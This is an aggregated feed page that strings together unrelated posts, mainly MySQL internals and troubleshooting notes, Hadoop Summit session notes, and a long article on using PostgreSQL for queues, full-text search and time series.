          • key-value stores like MongoDB, Cassandra, etc.
          • OLAP and OLTP
          • The Spark ecosystem


          SIGN UP

          TRAINER

          Raffael Marty is vice president of security analytics at Sophos, and is responsible for all strategic efforts around security analytics for the company and its products. He is based in San Francisco, Calif. Marty is one of the world's most recognized authorities on security data analytics, big data and visualization. His team at Sophos spans these domains to help build products that provide Internet security solutions to Sophos' vast global customer base.

          Previously, Marty launched pixlcloud, a visual analytics platform, and Loggly, a cloud-based log management solution. With a track record at companies including IBM Research, ArcSight, and Splunk, he is thoroughly familiar with established practices and emerging trends in the big data and security analytics space. Marty is the author of Applied Security Visualization and a frequent speaker at academic and industry events. Zen meditation has become an important part of Raffy's life, sometimes leading to insights not in data but in life.


                    DevGuild: Content Strategy – Conversion & Metrics Panel, With Twilio, Box, & MongoDB        

          Watch MongoDB CMO Meagen Eisenberg, Twilio’s Head of Content Devang Sachdev and VP of Marketing at Box Lauren Vaccarello in conversation with Reify founder Michael Bernstein as they discuss the metrics, tooling and decisions required to convert content audiences into paying customers.

          The post DevGuild: Content Strategy – Conversion & Metrics Panel, With Twilio, Box, & MongoDB appeared first on Heavybit.


                    Hadoop Summit San Jose June 13-14, 2012        
          Hadoop Summit is taking place in San Jose, California in June 13 and 14. There are different interesting and not so interesting sessions.

          An observation about organization - so many things are distributed, in the spirit of Hadoop distributed nature. Examples - one big hall for lunch and presenters' booths is in one end of the building, the sessions are in the other end of the building - so people have to walk there and back. Another example - lunch: boxes with sandwiches on one side of the hall, soda is on the other...

          There are no power sockets to plug your laptop. Only a couple of them along the walls.

          Several sessions are over-capacitated. Couldn't get to some of the sessions.

          But anyway here are some session notes:



          Hadoop sessions notes


          == AWS (Amazon Web Services) big data infrastructure



          • Netflix streams data from S3 directly into MapReduce (w/o HDFS) and back
          • Netflix bumps up from 300 to 400+ nodes over weekend
          • Netflix has an additional query cluster
          • Cheaper Experimentation = Faster Innovation
          • Logs are stored as JSON in S3
          • Honu a tool that aggregates logs and makes it available as Hive tables for analysts https://github.com/jboulon/Honu


          Another climate prediction company:

          • Provision a cluster, send data, run jobs, shut down the cluster.


          Case study airbnb (find a place to stay) - they moved from RDS to DinamoDB (Amazon nosql db)
          and use S3 for data storage



          == Unified Big Data Architecture: Integrating Hadoop within an Enterprise Analytical Ecosystem - Aster


          Different data:

          • stable schema (structured) - data from RDB's, ... Use Teradata or Hadoop sometimes
          • evolving schema (semi-structured) - web logs, twitter stream, ... Hadoop, Aster for joining with structured data and for SQL+MapReduce
          • no schema (unstructured), PDF files, images,... Hadoop, sometimes Aster for MapReduce Analytics



          Aster SQL-H - for business people

          • ANSI SQL on Hadoop data
          • through HCatalog it connects to Hive and HDFS




          == Scalding (new Hadoop language from Twitter)


          • it looked to me as a library for Scala and Cascading
          • it can read/write from/to HDFS, DBs, MemCache, etc...
          • the model is similar to Pig and coding style is similar to Cascading
          • you can develop locally without shipping to hadoop
          • I was loosing track actually when the guy was talking about scala or cascading or scalding because of lack of my knowledge in these things
          • scala is a language for writing, not reading (personal impression)



          == Microsoft Big Data



          • Microsoft wants to make sure that Hadoop works well on Azur as well as Windows
          • On Azur it has neat UI for administration and data processing
          • It has Hive console to create and manage Hive tables
          • It's all on http://hadooponazure.com



          • Integrating Excel to hadooponazure. You download an odbc driver for Hive and connect your Excel to Hive data.
          • Then can you can build Hive data and pull data to excel. Then this excel doc is uploaded to SharePoint where do all sorts of reporting, pivoting and charting. Once you republish this document to the SharePoint then you can schedule this excel document to refresh itself from hadoop with a certain cadency.


          .NET also has a neat way to programmatically submit the Hive jobs.

          JavaScript can call Hadoop jobs from "Interactive JavaScript console" in hadooponazure.com. You can query hive and parse the results into json and then graph it.

          Hadoop you do? I am fine... -- funny sentence.

          Overall: Microsoft did a good job in bringing Hadoop to the less technically prepared people.

          == Hadoop and Cloud @ Netflix

          • They recommend movies based on Facebook (user's profile, friends)
          • Everything is personalized
          • 25M+ subscribers
          • 4M/day ratings
          • Searches: 3M/day
          • Plays: 30M/day
          They use
          • Hadoop
          • Hive
          • Pig
          • Java
          They use "Markov Chains" algorithm.


          Sqoop 2



          • It's moving data from/to relational and non-relational databases
          • It's much easier to use than sqoop 1
          • It has UI admin panel
          • It's now client-server as opposed to only client sqoop 1
          • It's easier to integrate with Hive and HBase. In fact you can not only move data from db's to hdfs but also further move data to hive tables or hbase tables
          • It is going to be more secure






                    Eclipse Newsletter - BIRT and Big Data        
          Find out how to use BIRT to visualize data from Hadoop, Cassandra and MongoDB in this month's issue of the Eclipse Newsletter.
                    Etnies Aventa ODB LX Mens Leather Skate Shoes - Black        
          Etnies Aventa ODB LX Mens Leather Skate Shoes - Black

          Etnies Aventa ODB LX Mens Leather Skate Shoes - Black

          Great new style mens skate shoe from Etnies Leather uppers with warm plush lining stiREPEL water repellent treatment Tongue and heel pull for easy fit and featuring the STI Foam Lite 2 footbed for extra comfort.


                    NuoDB driver        
          I've tested these days NuoDB. It's a promising database server, for now in Beta, but there are some problems, that make NuoDB somehow more like a pre-alpha release. It's cool, it's cloud, it's nice and is something that we all want and need: SQL on the NoSQL market - the cloud.

          GyroGears already generates code for NuoDB, but since is so unstable, I don't recommend deploying Gyro applications on NuoDB.

          The driver low level API's are "pre-documented" here:
          http://www.radgs.com/docs/help/standard.db.nuo.html

          And the high level version:
          http://www.radgs.com/docs/help/NuoConnection.html
          http://www.radgs.com/docs/help/NuoDataSet.html

          Also, I've optimized the strings and the arrays in Concept core. I've reduced the number of memory reallocations, resulting in faster indexing times. I've added a compile-time flag for using std::map instead of my key-value implementation.

          std::map is faster than my implementation when adding more than 200,000 key-value pairs, but I'm faster on access. Also, std::map uses at least 1/3 more memory than my implementation, due to its list-style implementation. I use static vectors, that reallocate when needed. This reallocation is somehow slow, but overall, it performs better.

          The string operator += was optimized, being up to 20 times faster now, due to a new memory allocation strategy.

          In Gyro, besides NuoDB driver, I've fixed a bug with pagination, discovered in the new version of Concept Client.
                    UI models        
          I've seen some screenshots of enterprise applications, and I've decided that the Gyro application search/results-based UI is not enough for some situations.

          I've added a new property for every entity (you can actually combine models for different entities):


          You can choose from search/results (standard model) or master view/detail, minimizing the number of open forms for the user (and actually increasing the productivity for the end-user).




          The screenshots are from an actual application, so I've blurred some of the data.

          I've modified the home screen (yes, again):


          And as usual, bug-fixes, most of them regarding the MongoDB applications.
                    Re: OpenIndiana -nada postoji        
          OpenIndiana 2017.04


          + General system changes


          + Desktop software and libraries


          + Development tools and libraries


          + Server software



          Download: wiki.openindiana.org/oi/2017.04+Release+notes
                    MongoDB Stitches New Backend Database for the Cloud        

          Backend as a Service offering aims to enable developers to more easily integrate apps with data services.


                    volvo FMX        
          Pri Volvu nadaljuje tradicijo videozgodb s katerim predstavljajo svoje tehnične novosti. Daljinsko upravljanje gradbenega težkokategornika serije FMX so zaupali majhni deklici. Test je bil surov.







          več na avtomotoSiol


          [Objavil alfaromeo]

                    What is CHECK TABLE doing with InnoDB tables?        
          Recently we had a case where a customer got some corrupted blocks in his InnoDB tables. His largest tables where quite big, about 30 to 100 Gbyte. Why he got this corrupted blocks we did not find out yet (disk broken?).

          When you have corrupted blocks in InnoDB, it is mandatory to get rid of them again. Otherwise your database can crash suddenly.
          If you are lucky only "normal" tables are concerned. So you can dump, drop, recreate and load them again as described in the InnoDB recovery procedure in the MySQL documentation [1].
          If you are not so lucky you have to recreate your complete database or go back to an old backup and do a restore with a Point-in-Time-Recovery (PITR).

          To find out if some tables are corrupted MySQL provides 2 tools: The innochecksum utility [2] and the mysqlcheck utility [3] or you can use the CHECK TABLE command manually (which is used by mysqlcheck).

          I wanted to know how CHECK TABLE works in detail. So I looked first in the MySQL documentation [4]. But unfortunately the MySQL documentation does not go into details that much very often on such specific questions.

          So I dug into the code. The interesting lines you can find in the files handler/ha_innodb.cc and row/row0mysql.c. In the following snippets I have cut out a lot of detail stuff.

          The function ha_innobase::check is the interface between the CHECK TABLE command and the InnoDB storage engine and does the call of the InnoDB table check:

          // handler/ha_innodb.cc

          int ha_innobase::check( THD* thd )
          {

          build_template(prebuilt, NULL, table, ROW_MYSQL_WHOLE_ROW);

          ret = row_check_table_for_mysql(prebuilt);

          if (ret == DB_SUCCESS) {
          return(HA_ADMIN_OK);
          }

          return(HA_ADMIN_CORRUPT);
          }

          The function row_check_table_for_mysql does the different checks on an InnoDB table:

          • First it checks if the ibd file is missing.

          • Then the first index (dict_table_get_first_index) is checked on its consistency (btr_validate_index) by walking through all page tree levels. In InnoDB the first (primary) index is always equal to the table (= data).

          • If the index is consistent several other checks are performed (row_scan_and_check_index):

            • If entries are in ascendant order.

            • If unique constraint is not broken.

            • And the number of index entries is calculated.

          • Then the next and all other (secondary) indexes of the table are done in the same way.

          • At the end a WHOLE Adaptive Hash Index check for ALL InnoDB tables (btr_search_validate) is done for every CHECK TABLE!

          // row/row0mysql.c

          ulint row_check_table_for_mysql( row_prebuilt_t* prebuilt )
          {

          if ( prebuilt->table->ibd_file_missing ) {
          fprintf(stderr, "InnoDB: Error: ...", prebuilt->table->name);
          return(DB_ERROR);
          }

          index = dict_table_get_first_index(table);

          while ( index != NULL ) {

          if ( ! btr_validate_index(index, prebuilt->trx) ) {
          ret = DB_ERROR;
          }
          else {

          if ( ! row_scan_and_check_index(prebuilt, index, &n_rows) ) {
          ret = DB_ERROR;
          }

          if ( index == dict_table_get_first_index(table) ) {
          n_rows_in_table = n_rows;
          }
          else if ( n_rows != n_rows_in_table ) {

          ret = DB_ERROR;

          fputs("Error: ", stderr);
          dict_index_name_print(stderr, prebuilt->trx, index);
          fprintf(stderr, " contains %lu entries, should be %lu\n", n_rows, n_rows_in_table);
          }
          }

          index = dict_table_get_next_index(index);
          }

          if ( ! btr_search_validate() ) {
          ret = DB_ERROR;
          }

          return(ret);
          }

          A little detail which is NOT discussed in the code above is that the fatal lock wait timeout is set from 600 seconds (10 min) to 7800 seconds (2 h 10 min).

          /* Enlarge the fatal lock wait timeout during CHECK TABLE. */
          mutex_enter(&kernel_mutex);
          srv_fatal_semaphore_wait_threshold += 7200; /* 2 hours */
          mutex_exit(&kernel_mutex);

          As far as I understand this has 2 impacts:
          1. CHECK TABLE for VERY large tables (> 200 - 400 Gbyte) will most probably fail because it will exceed the fatal lock timeout. This becomes more probable when you have bigger tables, slower disks, less memory or do not make use of your memory appropriately.

          2. Because srv_fatal_semaphore_wait_threshold is a global variable, during every CHECK TABLE the fatal lock wait timeout is set high for the whole system. Long enduring InnoDB locks will be detected late or not at all during a long running CHECK TABLE command.


          If this is something which should be fixed to get a higher reliability of the system I cannot judge and is up to the InnoDB developers. But when you hit such symptoms during long running CHECK TABLE commands consider this.
          For the first finding I have filed a feature request [5]. This "problem" was introduced long time ago with bug #2694 [6] in MySQL 4.0, Sep 2004. Thanks to Axel and Shane for their comments.
          If you want to circumvent this situation you have either to recompile MySQL with higher values or you can use the concept of a pluggable User Defined Function (UDF) which I have described earlier [7], [8], [9].

          An other detail is that at the end of each CHECK TABLE command a check of all Adaptive Hash Indexes of all tables is done. I do not know how expensive it is to check all Adaptive Hash Indexes, especially when they are large. But having a more optimized code there could help to speed up the CHECK TABLE command for a small percentage?

          These information are valid up to MySQL/InnoDB 5.1.41 and the InnoDB plug-in 1.0.5.

          Literature

          [1] Forcing InnoDB Recovery
          [2] innochecksum — Offline InnoDB File Checksum Utility
          [3] mysqlcheck
          [4] CHECK TABLE
          [5] Bug #50723: InnoDB CHECK TABLE fatal semaphore wait timeout possibly too short for big table
          [6] Bug #2694: CHECK TABLE for Innodb table can crash server
          [7] MySQL useful add-on collection using UDF
          [8] Using MySQL User-Defined Functions (UDF) to get MySQL internal informations
          [9] MySQL useful add-on collection using UDF

          I'm going to FOSDEM, the Free and Open Source Software Developers' European Meeting
                    MySQL useful add-on collection using UDF        
          I really like this new toy (for me) called UDF. So I try to provide some more, hopefully useful, functionality.

          The newest extension I like is the possibility to write to the MySQL error log through the application. Oracle can do that since long. Now we can do this as well...

          A list of what I have done up to now you can find here:

          If you have some more suggestions, please let me know.

          The complete details you can find here.
                    Using MySQL User-Defined Functions (UDF) to get MySQL internal informations        
          In one of my previous posts I was writing about how to read other processes memory [1]. As an example I tried to get the value of the hard coded MySQL internal InnoDB variable spin_wait_delay (srv_spin_wait_delay).

          In this example we were using gdb or the operating system ptrace function to retrieve this value. This method has the disadvantage that it is pretty invasive.

          When I was working on a customer support case I had the idea to solve this by the much less invasive method of User-Defined Functions (UDF).

          UDF were introduced in MySQL 5.0 [2]. They provide the feasibility to enlarge the MySQL functionality by adding external code.

          The clue is now that you also can use this external code to do some MySQL internal stuff.

          My idea was now, instead of using gdb/ptrace to get the value of spin_wait_delay, to write and UDF to get and set this value.

          More details about the UDF itself, how to compile and load it you can find on my website [3].

          Then the UDF has to be loaded and activated in the database:

          mysql> CREATE FUNCTION spin_wait_delay RETURNS INTEGER SONAME "udf_spin_wait_delay.so";

          To remove the UDF again you can use the following command:

          mysql> DROP FUNCTION spin_wait_delay;

          To check if an UDF is installed or to see which ones are installed the following command gives you the right answer:

          mysql> SELECT * FROM mysql.func;
          +-----------------+-----+------------------------+----------+
          | name            | ret | dl                     | type     |
          +-----------------+-----+------------------------+----------+
          | spin_wait_delay |   2 | udf_spin_wait_delay.so | function |
          +-----------------+-----+------------------------+----------+

          When the UDF is compiled and properly loaded into the database you can get the value of spin_wait_delay as follows:

          mysql> SELECT spin_wait_delay();
          +--------------------+
          | spin_wait_delay(5) |
          +--------------------+
          |                  5 |
          +--------------------+

          And now the real nice thing is that you can even set this value as follows:

          mysql> SELECT sping_wait_delay(8);
          +--------------------+
          | spin_wait_delay(8) |
          +--------------------+
          |                  8 |
          +--------------------+

          With this function we can make a static hard coded InnoDB value dynamically changeable. To make it permanent also after a database restart possibly the functionality of init_file could help you further [4].

          With this concept we can think about implementing many missing things without touching the MySQL code itself or recompiling MySQL. Please let me know what is missing in your opinion and I can try to implement it. Because I am not a programer the help of those guys would be very appreciated.

          If anybody sees a problem with this method please let me know. I do not know about such things like thread safe and mutexes etc. But I think at least reading should not harm.

          Caution: When you have a crash in your UDF the whole MySQL server will crash. So be careful and test it intensively!

          Binary

          udf_spin_wait_delay.so (md5 807c6bc09b5dc88a8005788519f2483a)

                    MySQL licenses for dummies        
          The following summary shows my personal understanding of MySQL 5.1 licenses, packages and products. It does not necessarily reflect 100% the way MySQL understands it. But after all the discussions I hope it is as close as possible to the reality:

          MySQL Embedded Database Server (Download: enterprise.mysql.com -> OEM Software)
          Classic (OEM license, -MEM -InnoDB)
          Pro (= Classic +InnoDB)
          Advanced (= Pro +Partitioning)

          MySQL Community Sever (Download: www.mysql.com -> Downloads)
          Community (GPL, -NDB)

          MySQL Enterprise Server (Download: enterprise.mysql.com -> Enterprise Software)
          Pro (GPL or commercial, -NDB +InnoDB +MEM, Basic + Silver customer, MRU + QSP)
          Advanced (= Pro +Partitioning, Gold + Platinum customer)

          MySQL Cluster (Download: http://dev.mysql.com/downloads/cluster/)
          Community Edition (GPL, all features)
          Com (ex CGE?) (OEM or commercial, -InnoDB +NDB)
          Com-Pro (Com, all features)
          Standard Edition (= Com, -NDB-API -Cluster-Repl, -LDAP)

          Upgrade

          EP customer should follow the QSP trail unless it is critical for them to install an MRU to get a quick bugfix to hold them over until the next QSP is released.

          Month version / release
          0 5.1.30
          1 5.1.30-MRU1
          2 5.1.30-MRU2
          3 5.1.31
          4 5.1.31-MRU1 and 5.1.30-QSP
          5 5.1.31-MRU2
          6 5.1.32
          7 5.1.32-MRU1 and 5.1.31-QSP

          Legend

          CE  - Community Edition
          EP - Enterprise Edition (why not EE?)
          MRU - Monthly Rapid Update (EP only)
          QSP - Quarterly Service Pack (EP only)
          OEM - Original Equipment Manufacturer
          MEM - MySQL Enterprise Monitior
          CGE - Carrier Grade Edition
          Please correct me, if I am wrong. And when you have more questions let me know and I try to clear this.
                    MySQL Cluster: No more room in index file        
          Recently we were migrating an InnoDB/MyISAM schema to NDB. I was too lazy to calculate all the needed MySQL Cluster parameters (for example with ndb_size.pl) and just took my default config.ini template.
          Because I am really lazy I have a little script doing this for me (alter_engine.sh).

          But suddenly my euphoria was stopped abruptly by the following error:

          MySQL error code 136: No more room in index file

          The usual command that helps me in such a situation is a follows:

          # perror 136
          MySQL error code 136: No more room in index file

          But in this case it is not really helpful. Also

          # perror --ndb 136

          does not bring us further. Strange: Index file... We are converting from MyISAM/InnoDB to NDB. Why the hell is he using an index file for this operation? It seems to be clearly a mysqld error message and not a MySQL Cluster error message. And we are also not using MySQL Cluster disk data tables.

          After bothering a bit MySQL support I had the idea to do the following:

          # ndb_show_tables | grep -ic orderedindex
          127

          The MySQL online documentation clearly states:

          MaxNoOfOrderedIndexes
          ...
          The default value of this parameter is 128.

          So this could be the reason! When I have changed this parameter followed by the common rolling restart of the MySQL Cluster I could continue to migrate my schema into cluster...

          Conclusion
          MySQL errors can be related to cluster errors and do not necessarily point to the source of the problem. The error:

          MySQL error code 136: No more room in index file


          means just MaxNoOfOrderedIndexes is too small!


          I hope that I can safe you some time with this little article.
                    Web HSP Officially Launches (4) Unique VideoDB Hosting Packages for All VPS and Dedicated Server Clients in North America        

          Late Thursday afternoon, Web HSP CEO and co-founder Doug Davis announced the official launch of (4) different VideoDB hosting packages now available to all new and existing customers. The bold move compliments the ever-expanding menu of products and services as Web HSP continues their unprecedented growth in 2013.

          (PRWeb September 20, 2013)

          Read the full story at http://www.prweb.com/releases/2013/9/prweb11144328.htm


                    ITX Design Introduces (4) VideoDB Hosting Packages for All VPS and Dedicated Server Clients in North America        

          Late Friday afternoon, ITX Design CEO and co-founder Doug Davis announced the official launch of (4) different VideoDB hosting packages now available to all new and existing customers. The bold move compliments the ever-expanding menu of products and services as ITX Design continues their unprecedented growth in 2013

          (PRWeb August 24, 2013)

          Read the full story at http://www.prweb.com/releases/2013/8/prweb11059289.htm


                    SF MongoDB Days: Bigger, Better than MongoDB Los Angeles 2013        

          This year, San Francisco was the destination for MongoDB Days 2014 and through the rainy weather and Los Angeles like traffic, hundreds of passionate developers, partners, and technology vendors gathered to hear about the latest release of MongoDB 2.8. In 2013 there was MongoDB Los Angeles, and naturally we were excited to see what has changed, […]

          The post SF MongoDB Days: Bigger, Better than MongoDB Los Angeles 2013 appeared first on Diamond.


                    MongoDB IPO Rumor Mill: Why MongoDB Will Crush in 2015        

          MongoDB is becoming the go-to database for many, and a household name for those in the biz. MongoDB’s humble beginnings were those of a start up and have since grown into a huge deal and dare I say, a savior to many businesses of varying sizes with an impressive roster of clients including MetLife, BuzzFeed, […]

          The post MongoDB IPO Rumor Mill: Why MongoDB Will Crush in 2015 appeared first on Diamond.


                    RAD Studio FireDAC Support for MongoDB NoSQL Database - Jim McKeeth        
          none
                    Is PostgreSQL good enough?        
          tldr; you can do jobs, queues, real time change feeds, time series, object store, document store, full text search with PostgreSQL. How to, pros/cons, rough performance and complexity levels are all discussed. Many sources and relevant documentation is linked to.

          Your database is first. But can PostgreSQL be second?

          Web/app projects these days often have many distributed parts. It's not uncommon for groups to use the right tool for the job. The right tools are often something like the choice below.
          • Redis for queuing, and caching.
          • Elastic Search for searching, and log stash.
          • Influxdb or RRD for timeseries.
          • S3 for an object store.
          • PostgreSQL for relational data with constraints, and validation via schemas.
          • Celery for job queues.
          • Kafka for a buffer of queues or stream processing.
          • Exception logging with PostgreSQL (perhaps using Sentry)
          • KDB for low latency analytics on your column oriented data.
          • Mongo/ZODB for storing documents JSON (or mangodb for /dev/null replacement) 
          • SQLite for embedded. 
          • Neo4j for graph databases.
          • RethinkDB for your realtime data, when data changes, other parts 'react'.
          • ...
          For all the different nodes this could easily cost thousands a month, require lots of ops knowledge and support, and use up lots of electricity. To set all this up from scratch could cost one to four weeks of developer time depending on if they know the various stacks already. Perhaps you'd have ten nodes to support.

          Could you gain an ops advantage by using only PostgreSQL? Especially at the beginning when your system isn't all that big, and your team size is small, and your requirements not extreme? Only one system to setup, monitor, backup, install, upgrade, etc.

          This article is my humble attempt to help people answer the question...

          Is PostgreSQL good enough?

          Can it be 'good enough' for all sorts of different use cases? Or do I need to reach into another toolbox?

          Every project is different, and often the requirements can be different. So this question by itself is impossible to answer without qualifiers. Many millions of websites and apps in the world have very few users (less than thousands per month), they might need to handle bursty traffic at 100x the normal rate some times. They might need interactive, or soft realtime performance requirements for queries and reports. It's really quite difficult to answer the question conclusively for every use case, and for every set of requirements. I will give some rough numbers and point to case studies, and external benchmarks for each section.

          Most websites and apps don't need to handle 10 million visitors a month, or have 99.999% availability when 95% availability will do, ingest 50 million metric rows per day, or do 400,000 jobs per second, or query over TB's of data with sub millisecond response times.

          Tool choice.

          I've used a LOT of different databases over time. CDB, Elastic Search, Redis, SAP (is it a db or a COBOL?), BSDDB/GDBM, SQLite... Even written some where the requirements were impossible to match with off the shelf systems and we had to make them ourselves (real time computer vision processing of GB/second in from the network). Often PostgreSQL simply couldn't do the job at hand (or mysql was installed already, and the client insisted). But sometimes PostgreSQL was just merely not the best tool for the job.

          A Tool Chest
          Recently I read a book about tools. Woodworking tools, not programming tools. The whole philosophy of the book is a bit much to convey here... but The Anarchist's Tool Chest is pretty much all about tool choice (it's also a very fine looking book, that smells good too). One lesson it teaches is about when selecting a plane (you know the things for stripping wood). There are dozens of different types perfect for specific situations. There's also some damn good general purpose planes, and if you just select a couple of good ones you can get quite a lot done. Maybe not the best tool for the job, but at least you will have room for them in your tool chest. On the other hand, there are also swiss army knives, and 200 in one tools off teevee adverts. I'm pretty sure PostgreSQL is some combination of a minimal tool choice and the swiss army knife tool choice in the shape of a big blue solid elephant.

          “PostgreSQL is an elephant sized tool chest that holds a LOT of tools.”

          Batteries included?

          Does PostgreSQL come with all the parts for full usability? Often the parts are built in, but maybe a bit complicated, but not everything is built in. But luckily there are some good libraries which make the features more usable ("for humans").

          For from scratch people, I'll link to the PostgreSQL documentation. I'll also link to already made systems which already use PostgreSQL for (queues, time series, graphs, column stores, document data bases), which you might be able to use for your needs. This article will slanted towards the python stack, but there are definitely alternatives in the node/ruby/perl/java universes. If not, I've listed the PostgreSQL parts and other open source implementations so you can roll your own.

          By learning a small number of PostgreSQL commands, it may be possible to use 'good enough' implementations yourself. You might be surprised at what other things you can implement by combining these techniques together. 

          Task, or job queues.

          Recent versions of PostgeSQL support a couple of useful technologies for efficient and correct queues.

          First is the LISTEN/NOTIFY. You can LISTEN for events, and have clients be NOTIFY'd when they happen. So your queue workers don't have to keep polling the database all the time. They can get NOTIFIED when things happen.

          The recent addition in 9.5 of the SKIP LOCKED locking clause to PostgreSQL SELECT, enables efficient queues to be written when you have multiple writers and readers. It also means that a queue implementation can be correct [2].

          Finally 9.6 saw plenty of VACUUM performance enhancements which help out with queues.

          Batteries included?

          A very popular job and task system is celery. It can support various SQL backends, including PostgreSQL through sqlalchemy and the Django ORM. [ED: version 4.0 of celery doesn't have pg support]


          A newer, and smaller system is called pq. It sort of models itself off the redis python 'rq' queue API. However, with pq you can have a transactional queue. Which is nice if you want to make sure other things are committed AND your job is in the queue. With a separate system this is a bit harder to guarantee.

          Is it fast enough? pq states in its documentation that you can do 1000 jobs per second per core... but on my laptop it did around 2000. In the talk "Can elephants queue?" 10,000 messages per second are mentioned with eight clients.

          More reading.
          1. http://www.cybertec.at/skip-locked-one-of-my-favorite-9-5-features/
          2. http://blog.2ndquadrant.com/what-is-select-skip-locked-for-in-postgresql-9-5/
          3. https://www.pgcon.org/2016/schedule/track/Applications/929.en.html 

          Full text search.

          “Full text search — Searching the full text of the document, and not just the metadata.”
          PostgreSQL has had full text search for quite a long time as a separate extension, and now it is built in. Recently, it's gotten a few improvements which I think now make it "good enough" for many uses.

          The big improvement in 9.6 is phrase search. So if I search for "red hammer" I get things which have both of them - not things that are red, and things that are a hammer. It can also return documents where the first word is red, and then five words later hammer appears.

          One other major thing that elastic search does is automatically create indexes on all the fields. You add a document, and then you can search it. That's all you need to do. PostgreSQL is quite a lot more manual than that. You need to tell it which fields to index, and update the index with a trigger on changes (see triggers for automatic updates).  But there are some libraries which make things much easier. One of them is sqlalchemy_searchable. However, I'm not aware of anything as simple and automatic as elastic search here.
          • What about faceted search? These days it's not so hard to do at speed. [6][7]
          • What about substring search on an index (fast LIKE)? It can be made fast with a trigram index. [8][9]
          • Stemming? Yes. [11
          • "Did you mean" fuzzy matching support? Yes. [11
          • Accent support? (My name is René, and that last é breaks sooooo many databases). Yes. [11]
          • Multiple languages? Yes. [11]
          • Regex search when you need it? Yes. [13]
          If your main data store is PostgreSQL and you export your data into Elasticsearch (you should NOT use elastic search as the main store, since it still crashes sometimes), then that's also extra work you need to do. With elastic search you also need to manually set weighting of different fields if you want the search to work well. So in the end it's a similar amount of work.

          Using the right libraries, I think it's a similar amount of work overall with PostgreSQL. Elasticsearch is still easier initially. To be fair Lucene (which elasticsearch is based on) is a much more advanced text searching system.

          What about the speed? They are index searches, and return fast - as designed. At [1] they mention that the speed is ok for 1-2 million documents. They also mention 50ms search time. It's also possible to make replicas for read queries if you don't want to put the search load on your main database. There is another report for searches taking 15ms [10]. Note that elastic search often takes 3-5ms for a search on that same authors hardware. Also note, that the new asyncpg PostgreSQL driver gives significant latency improvements for general queries like this (35ms vs 2ms) [14].

          Hybrid searches (relational searches combined with full text search) is another thing that PostgreSQL makes pretty easy. Say you wanted to ask "Give me all companies who have employees who wrote research papers, stack overflow answers, github repos written with the text 'Deep Learning' where the authors live with within 50km of Berlin. PostgreSQL could do those joins fairly efficiently for you.

          The other massive advantage of PostgreSQL is that you can keep the search index in sync. The search index can be updated in the same transaction. So your data is consistent, and not out of date. It can be very important for some applications to return the most recent data.

          How about searching across multiple human natural languages at once? PostgreSQL allows you to efficiently join across multiple language search results. So if you type "red hammer" into a German hardware website search engine, you can actually get some results.

          Anyone wanting more in-depth information should read or watch this FTS presentation [15] from last year. It's by some of the people who has done a lot of work on the implementation, and talks about 9.6 improvements, current problems, and things we might expect to see in version 10. There is also a blog post [16] with more details about various improvements in 9.6 to FTS.


          You can see the RUM index extension (which has faster ranking) at https://github.com/postgrespro/rum



          More reading.
          1. https://blog.lateral.io/2015/05/full-text-search-in-milliseconds-with-postgresql/
          2. https://billyfung.com/writing/2017/01/postgres-9-6-phrase-search/
          3. https://www.postgresql.org/docs/9.6/static/functions-textsearch.html
          4. http://www.postgresonline.com/journal/archives/368-PostgreSQL-9.6-phrase-text-searching-how-far-apart-can-you-go.html
          5. https://sqlalchemy-searchable.readthedocs.io/
          6. http://akorotkov.github.io/blog/2016/06/17/faceted-search/
          7. http://stackoverflow.com/questions/10875674/any-reason-not-use-postgresqls-built-in-full-text-search-on-heroku  
          8. https://about.gitlab.com/2016/03/18/fast-search-using-postgresql-trigram-indexes/
          9. http://blog.scoutapp.com/articles/2016/07/12/how-to-make-text-searches-in-postgresql-faster-with-trigram-similarity
          10. https://github.com/codeforamerica/ohana-api/issues/139
          11. http://rachbelaid.com/postgres-full-text-search-is-good-enough/  
          12. https://www.compose.com/articles/indexing-for-full-text-search-in-postgresql/
          13. https://www.postgresql.org/docs/9.6/static/functions-matching.html  
          14. https://magic.io/blog/asyncpg-1m-rows-from-postgres-to-python/report.html
          15. https://www.pgcon.org/2016/schedule/events/926.en.html 
          16. https://postgrespro.com/blog/pgsql/111866
             



          Time series.

          “Data points with timestamps.”
          Time series databases are used a lot for monitoring. Either for monitoring server metrics (like cpu load) or for monitoring sensors and all other manner of things. Perhaps sensor data, or any other IoT application you can think of.

          RRDtool from the late 90s.
           To do efficient queries of data over say a whole month or even a year, you need to aggregate the values into smaller buckets. Either minute, hour, day, or month sized buckets. Some data is recorded at such a high frequency, that doing an aggregate (sum, total, ...) of all that data would take quite a while.

          Round robin databases don't even store all the raw data, but put things into a circular buffer of time buckets. This saves a LOT of disk space.

          The other thing time series databases do is accept a large amount of this type of data. To efficiently take in a lot of data, you can use things like COPY IN, rather than lots of individual inserts, or use SQL arrays of data. In the future (PostgreSQL 10), you should be able to use logical replication to have multiple data collectors.

          Materialized views can be handy to have a different view of the internal data structures. To make things easier to query.

          date_trunc can be used to truncate a timestamp into the bucket size you want. For example SELECT date_trunc('hour', timestamp) as timestamp.

          Array functions, and binary types can be used to store big chunks of data in a compact form for processing later. Many time series databases do not need to know the latest results, and some time lag is good enough.

          A BRIN index (new in 9.5) can be very useful for time queries. Selecting between two times on a field indexed with BRIN is much quicker.  "We managed to improve our best case time by a factor of 2.6 and our worst case time by a factor of 30" [7]. As long as the rows are entered roughly in time order [6]. If they are not for some reason you can reorder them on disk with the CLUSTER command -- however, often time series data comes in sorted by time.

          Monasca can provide graphana and API, and Monasca queries PostgreSQL. There's still no direct support in grapha for PostgreSQL, however work has been in progress for quite some time. See the pull request in grafana.

          Another project which uses time series in PostgreSQL is Tgres. It's compatible with statsd, graphite text for input, and provides enough of the Graphite HTTP API to be usable with Grafana. The author also blogs[1] a lot about different optimal approaches to use for time series databases.

          See this talk by Steven Simpson at the fosdem conference about infrastructure monitoring with PostgreSQL. In it he talks about using PostgreSQL to monitor and log a 100 node system.

          In an older 'grisha' blog post [5], he states "I was able to sustain a load of ~6K datapoints per second across 6K series" on a 2010 laptop.

          Can we get the data into a dataframe structure for analysis easily? Sure, if you are using sqlalchemy and pandas dataframes, you can load dataframes like this...  
          df = pd.read_sql(query.statement, query.session.bind)
          This lets you unleash some very powerful statistics, and machine learning tools on your data. (there's also a to_sql).


          Some more reading.
          1. https://grisha.org/blog/2016/12/16/storing-time-series-in-postgresql-part-ii/
          2. https://www.postgresql.org/docs/9.6/static/parallel-plans.html
          3. http://blog.2ndquadrant.com/parallel-aggregate/
          4. https://mike.depalatis.net/using-postgres-as-a-time-series-database.html  
          5. https://grisha.org/blog/2016/11/08/load-testing-tgres/
